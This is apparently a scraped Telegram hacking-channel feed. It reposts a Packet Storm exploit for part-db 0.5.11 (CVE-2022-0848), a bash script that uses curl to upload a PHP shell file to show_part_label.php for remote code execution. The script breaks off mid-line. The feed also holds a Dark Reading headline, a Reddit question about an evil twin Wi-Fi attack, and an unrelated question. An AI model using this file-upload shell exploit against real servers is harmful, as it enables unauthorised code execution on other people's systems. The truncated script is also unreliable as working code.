Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
part-db 0.5.11 Remote Code Execution

https://4.bp.blogspot.com/-gp6vAY2GXMM/WWlvG3cWkQI/AAAAAAAAILY/aMDesAGFEocqJU-7SaIaO870_Bbf2ZUHACLcBGAs/s1600/h139.png
part-db version 0.5.11 suffers from a remote code execution vulnerability.

MD5 | 0a4b599d9e4ab630547f878d967ae1f8

Download
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Industrial Systems See More Vulnerabilities, Greater Threat

The makers of operational technology and connected devices saw reported vulnerabilities grow by half in 2021, but other trends may be more disturbing.
hacking: security in practice
Trying out evil twin attack but after putting my wireless card into monitor mode and starting hostapd, my wireless card goes into master mode

Hey everyone, so I’ve been trying lately to get an evil twin attack to work in my lab setup. It works sometimes, but sometimes after I start up hostapd for the fake access point, I noticed that the wireless card goes into master mode now. Is there a fix for that? Anything I can do?

submitted by /u/ismaeljabbar
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Scrypt to find relation between numbers

Do you know any github project that given a list of numbers, for example (1234,2234,3234,4234) gets the relation with other list like (A234, B234,C234,D234)

submitted by /u/drZoidberg1492
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video